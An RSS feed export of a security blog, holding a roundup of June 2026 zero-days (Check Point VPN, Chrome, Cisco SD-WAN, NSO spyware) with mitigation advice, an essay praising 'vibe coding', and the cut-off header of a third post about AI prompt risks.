<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:googleplay="http://www.google.com/schemas/play-podcasts/1.0"><channel><title><![CDATA[Rod’s Blog]]></title><description><![CDATA[Microsoft Security and AI. This is not an official Microsoft blog.]]></description><link>https://rodtrent.substack.com</link><image><url>https://substackcdn.com/image/fetch/$s_!rp9E!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe527d2fc-7b2f-448b-85fa-0e47bf452405_600x600.png</url><title>Rod’s Blog</title><link>https://rodtrent.substack.com</link></image><generator>Substack</generator><lastBuildDate>Wed, 10 Jun 2026 00:12:38 GMT</lastBuildDate><atom:link href="https://rodtrent.substack.com/feed" rel="self" type="application/rss+xml"/><copyright><![CDATA[Rod Trent]]></copyright><language><![CDATA[en]]></language><webMaster><![CDATA[rodtrent@substack.com]]></webMaster><itunes:owner><itunes:email><![CDATA[rodtrent@substack.com]]></itunes:email><itunes:name><![CDATA[Rod Trent]]></itunes:name></itunes:owner><itunes:author><![CDATA[Rod Trent]]></itunes:author><googleplay:owner><![CDATA[rodtrent@substack.com]]></googleplay:owner><googleplay:email><![CDATA[rodtrent@substack.com]]></googleplay:email><googleplay:author><![CDATA[Rod Trent]]></googleplay:author><itunes:block><![CDATA[Yes]]></itunes:block><item><title><![CDATA[Security Check-in Quick Hits: VPN Zero-Days, Browser Exploits, SD-WAN Attacks, and Spyware Showdowns]]></title><description><![CDATA[For June 9, 2026]]></description><link>https://rodtrent.substack.com/p/security-check-in-quick-hits-vpn-b65</link><guid isPermaLink="false">https://rodtrent.substack.com/p/security-check-in-quick-hits-vpn-b65</guid><dc:creator><![CDATA[Rod Trent]]></dc:creator><pubDate>Tue, 09 Jun 2026 18:01:28 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!CZuA!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4f2fb0e4-d35b-4bcb-a1a5-3da887a65521_1168x784.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!CZuA!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4f2fb0e4-d35b-4bcb-a1a5-3da887a65521_1168x784.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!CZuA!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4f2fb0e4-d35b-4bcb-a1a5-3da887a65521_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!CZuA!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4f2fb0e4-d35b-4bcb-a1a5-3da887a65521_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!CZuA!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4f2fb0e4-d35b-4bcb-a1a5-3da887a65521_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!CZuA!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4f2fb0e4-d35b-4bcb-a1a5-3da887a65521_1168x784.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!CZuA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4f2fb0e4-d35b-4bcb-a1a5-3da887a65521_1168x784.jpeg" width="1168" height="784" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4f2fb0e4-d35b-4bcb-a1a5-3da887a65521_1168x784.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:784,&quot;width&quot;:1168,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:240623,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/201281663?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4f2fb0e4-d35b-4bcb-a1a5-3da887a65521_1168x784.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!CZuA!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4f2fb0e4-d35b-4bcb-a1a5-3da887a65521_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!CZuA!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4f2fb0e4-d35b-4bcb-a1a5-3da887a65521_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!CZuA!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4f2fb0e4-d35b-4bcb-a1a5-3da887a65521_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!CZuA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4f2fb0e4-d35b-4bcb-a1a5-3da887a65521_1168x784.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3>Check Point VPN Zero-Day (CVE-2026-50751) Exploited by Qilin Ransomware Affiliate</h3><p>Attackers gained a significant head start on a critical authentication bypass vulnerability in Check Point&#8217;s Remote Access VPN and Mobile Access solutions. Exploitation began as early as May 7, 2026, with Check Point confirming active use in targeted attacks, including at least one case linked to a Qilin ransomware affiliate. The flaw (CVSS 9.3) allows unauthenticated remote access, enabling post-exploitation activities like deploying Linux ransomware binaries and downloading malicious ELF files.</p><p><strong>Impact</strong>: Primarily affected a limited number of organizations (dozens globally), but the financial motivation and ransomware tie-in highlight risks to remote access infrastructure. Organizations using deprecated IKEv1 protocols are especially exposed.</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p><strong>Mitigation</strong>: Apply Check Point&#8217;s urgent hotfix immediately. Review logs for suspicious activity since early May, rotate credentials, and monitor for Qilin indicators. Disable unnecessary VPN features if unpatched. This incident underscores the need for rapid patching of VPN endpoints, which remain prime targets for initial access.</p><h3>Google Patches 5th Chrome Zero-Day of 2026 (CVE-2026-11645)</h3><p>Google released updates for Chrome 149 addressing 74 vulnerabilities, including a high-severity zero-day (CVE-2026-11645) in the V8 JavaScript engine. This out-of-bounds read/write flaw allows arbitrary code execution via crafted HTML pages, even within the sandbox. It marks the fifth actively exploited Chrome zero-day this year, reported by an anonymous researcher in late April.</p><p><strong>Impact</strong>: Widespread risk to billions of users, as browser exploits often lead to malware delivery, credential theft, or further network compromise. In-the-wild exploitation makes prompt updates critical.</p><p><strong>Mitigation</strong>: Update Chrome immediately (auto-updates should handle this; check via Help &gt; About Google Chrome). Enable enhanced protection features, use site isolation, and avoid clicking suspicious links. For enterprises, deploy group policies to enforce updates. This continues a troubling pattern of frequent high-impact browser flaws in 2026.</p><h3>Cisco SD-WAN Zero-Day Under Active Exploitation</h3><p>Cisco warned of ongoing exploitation of a zero-day flaw in its Catalyst SD-WAN products (related to command injection and prior auth bypass issues). This fits into a series of SD-WAN vulnerabilities exploited in 2026 by sophisticated actors (e.g., tracked groups like UAT-8616). No patches for the latest issue in some advisories, with attackers leveraging it for privileged access and persistence.</p><p><strong>Impact</strong>: Targets enterprise networking infrastructure, potentially enabling broad network compromise, data exfiltration, or ransomware deployment. SD-WAN&#8217;s critical role in modern connectivity amplifies the blast radius.</p><p><strong>Mitigation</strong>: Apply available patches urgently, restrict exposure of management interfaces, and implement network segmentation. Monitor for anomalous activity using Cisco Talos guidance. Organizations should accelerate zero-trust architectures to limit lateral movement from such footholds.</p><h3>Meta Escalates Legal Action Against NSO Group Over New WhatsApp Spyware/Phishing Attacks</h3><p>Meta (WhatsApp) detected and disrupted spear-phishing campaigns linked to NSO Group, violating a prior permanent injunction barring the spyware firm from targeting WhatsApp users. Meta is filing a contempt of court order, following earlier $167M+ damages rulings. Attacks involved malicious links and test accounts aimed at compromising users.</p><p><strong>Impact</strong>: Highlights persistent state-sponsored spyware threats and challenges in enforcing legal remedies against such actors. Users, especially journalists, activists, and officials, remain at risk from sophisticated social engineering.</p><p><strong>Mitigation</strong>: Avoid clicking unsolicited links in messages; verify senders. Use WhatsApp&#8217;s security features (e.g., two-step verification, disappearing messages). Organizations should train on phishing and consider advanced endpoint protections. This case reinforces the ongoing cat-and-mouse game with commercial spyware vendors.</p><p>These incidents reflect broader 2026 trends: rapid exploitation of zero-days in critical infrastructure (VPNs, browsers, networking), ransomware opportunism, and evolving spyware tactics amid AI acceleration of attacks.</p><p></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item><item><title><![CDATA[Vibe Coding: Unleashing Creativity in the Age of AI]]></title><description><![CDATA[No CS degree? No problem. Just vibes, questionable life choices, and an AI that actually ships]]></description><link>https://rodtrent.substack.com/p/vibe-coding-unleashing-creativity</link><guid isPermaLink="false">https://rodtrent.substack.com/p/vibe-coding-unleashing-creativity</guid><dc:creator><![CDATA[Rod Trent]]></dc:creator><pubDate>Tue, 09 Jun 2026 12:02:11 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!WS_v!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbc06425-c46a-4633-b554-86cd740dab6b_1168x784.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!WS_v!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbc06425-c46a-4633-b554-86cd740dab6b_1168x784.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!WS_v!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbc06425-c46a-4633-b554-86cd740dab6b_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!WS_v!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbc06425-c46a-4633-b554-86cd740dab6b_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!WS_v!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbc06425-c46a-4633-b554-86cd740dab6b_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!WS_v!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbc06425-c46a-4633-b554-86cd740dab6b_1168x784.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!WS_v!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbc06425-c46a-4633-b554-86cd740dab6b_1168x784.jpeg" width="1168" height="784" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/cbc06425-c46a-4633-b554-86cd740dab6b_1168x784.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:784,&quot;width&quot;:1168,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:376256,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/199593844?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbc06425-c46a-4633-b554-86cd740dab6b_1168x784.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!WS_v!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbc06425-c46a-4633-b554-86cd740dab6b_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!WS_v!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbc06425-c46a-4633-b554-86cd740dab6b_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!WS_v!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbc06425-c46a-4633-b554-86cd740dab6b_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!WS_v!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbc06425-c46a-4633-b554-86cd740dab6b_1168x784.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>In the not-so-distant past, building software felt like an exclusive club. You needed years of classes, late nights debugging syntax errors, and a solid grasp of algorithms, frameworks, and best practices. If you had a brilliant idea for an app, a tool, or a digital experience, the path from spark to reality was paved with steep technical barriers. For creative minds&#8212;designers, entrepreneurs, artists, writers, and problem-solvers without formal developer training&#8212;this often meant shelving ideas or relying on expensive hires.</p><p>Enter <strong>vibe coding</strong>, a paradigm shift that&#8217;s changing everything.</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p>Coined by AI pioneer Andrej Karpathy in early 2025, vibe coding is the practice of describing what you want in natural language&#8212;&#8221;the vibe&#8221;&#8212;and letting advanced AI models handle the heavy lifting of generating, refining, and iterating on code. You don&#8217;t write lines of code; you <em>converse</em> your vision into existence. You say things like &#8220;Build me a simple habit tracker with streaks, social sharing, and calming visuals,&#8221; and the AI delivers functional prototypes, often in minutes.</p><h3>The Magic of Letting Go</h3><p>Traditional coding demands precision and deep technical knowledge. Vibe coding invites flow. You embrace the exponential power of large language models (LLMs), focus on outcomes rather than implementation details, and iterate rapidly through conversation. It&#8217;s not about forgetting best practices entirely&#8212;it&#8217;s about prioritizing momentum, experimentation, and creativity over perfection from the start.</p><p>This approach is particularly transformative for <strong>creative people</strong>. Imagine:</p><ul><li><p>A photographer who wants a custom portfolio site with AI-generated mood boards&#8212;no need to learn React or CSS frameworks.</p></li><li><p>A teacher designing an interactive learning tool for their students without studying database architecture.</p></li><li><p>An artist prototyping a generative installation or a small business owner creating a custom inventory system tailored to their quirky workflow.</p></li></ul><p>Vibe coding removes the gatekeeping. You don&#8217;t need to &#8220;dig deep&#8221; into developer classes or spend months skilling up. Your creativity, domain expertise, and intuition become the primary drivers. The AI acts as an infinitely patient collaborator that translates your vision into working software.</p><h3>Not a Bad Thing&#8212; A Democratizing Force</h3><p>Critics sometimes dismiss vibe coding as &#8220;vibeslop&#8221;&#8212;sloppy, unmaintainable code produced by people who don&#8217;t understand what&#8217;s under the hood. And yes, for large-scale production systems with strict security, performance, or scalability needs, deep expertise still matters. But calling it inherently bad misses the point.</p><p><strong>Vibe coding levels the playing field.</strong> It empowers a massive new wave of creators who were previously locked out. Non-technical founders, side-hustlers, researchers, and hobbyists can now turn ideas into reality faster than ever. This isn&#8217;t replacing skilled engineers; it&#8217;s expanding the ecosystem. Professional developers use it too&#8212;for rapid prototyping, exploring wild ideas, and accelerating mundane tasks.</p><p>The result? An explosion of solutions that simply wouldn&#8217;t exist otherwise. Niche tools addressing hyper-specific problems. Experimental art projects. Community-driven apps. Personal utilities that solve one person&#8217;s frustration and end up helping thousands. Innovation isn&#8217;t just faster&#8212;it&#8217;s more diverse, because it draws from a broader pool of human experience and imagination.</p><h3>The New Era of Achievable Ideas</h3><p>Before vibe coding, many ideas died in notebooks or &#8220;someday&#8221; lists due to technical friction. Now, the barrier is primarily <em>imagination</em> and <em>iteration</em>. You can build a weekend project that evolves into a startup. You can test concepts in hours instead of weeks. You can refine based on real feedback rather than theoretical planning.</p><p>This doesn&#8217;t mean the end of rigorous software engineering. It means a healthier division of labor: creatives and domain experts drive the &#8220;what&#8221; and &#8220;why,&#8221; while AI handles much of the &#8220;how,&#8221; and traditional developers focus on architecture, optimization, and complex systems where precision is non-negotiable.</p><p>Vibe coding celebrates the human element&#8212;intuition, taste, and vision&#8212;while offloading the mechanical. It&#8217;s joyful, accessible, and profoundly enabling.</p><h3>Embrace the Vibe</h3><p>If you&#8217;ve ever had an idea that excited you but felt intimidated by the technical hurdles, now is the time. Tools like Claude, Cursor, Gemini, Grok, and others make vibe coding more powerful every day. Start small. Describe your vision. Iterate. Ship something imperfect and improve it.</p><p>The future of building belongs to those who can dream vividly and communicate clearly. Vibe coding doesn&#8217;t lower standards&#8212;it multiplies creators. It turns more thinkers into makers. And in doing so, it unlocks a wave of solutions, experiences, and innovations that make the world a little more interesting.</p><p>What vibe will you code into reality today?</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item><item><title><![CDATA[Security Check-in Quick Hits: AI Prompt Risks, Hybrid Ransomware Heists, and Fresh Vulnerabilities Dominate]]></title><description><![CDATA[For May 8, 2026]]></description><link>https://rodtrent.substack.com/p/security-check-in-quick-hits-ai-prompt</link><guid isPermaLink="false">https://rodtrent.substack.com/p/security-check-in-quick-hits-ai-prompt</guid><dc:creator><![CDATA[Rod Trent]]></dc:creator><pubDate>Mon, 08 Jun 2026 18:01:13 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!lFho!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56e6f0fa-f268-460d-b8a4-25967e9db553_1168x784.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!lFho!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56e6f0fa-f268-460d-b8a4-25967e9db553_1168x784.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!lFho!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56e6f0fa-f268-460d-b8a4-25967e9db553_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!lFho!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56e6f0fa-f268-460d-b8a4-25967e9db553_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!lFho!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56e6f0fa-f268-460d-b8a4-25967e9db553_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!lFho!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56e6f0fa-f268-460d-b8a4-25967e9db553_1168x784.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!lFho!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56e6f0fa-f268-460d-b8a4-25967e9db553_1168x784.jpeg" width="1168" height="784" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/56e6f0fa-f268-460d-b8a4-25967e9db553_1168x784.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:784,&quot;width&quot;:1168,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:315197,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/201128333?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56e6f0fa-f268-460d-b8a4-25967e9db553_1168x784.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!lFho!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56e6f0fa-f268-460d-b8a4-25967e9db553_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!lFho!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56e6f0fa-f268-460d-b8a4-25967e9db553_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!lFho!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56e6f0fa-f268-460d-b8a4-25967e9db553_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!lFho!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56e6f0fa-f268-460d-b8a4-25967e9db553_1168x784.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 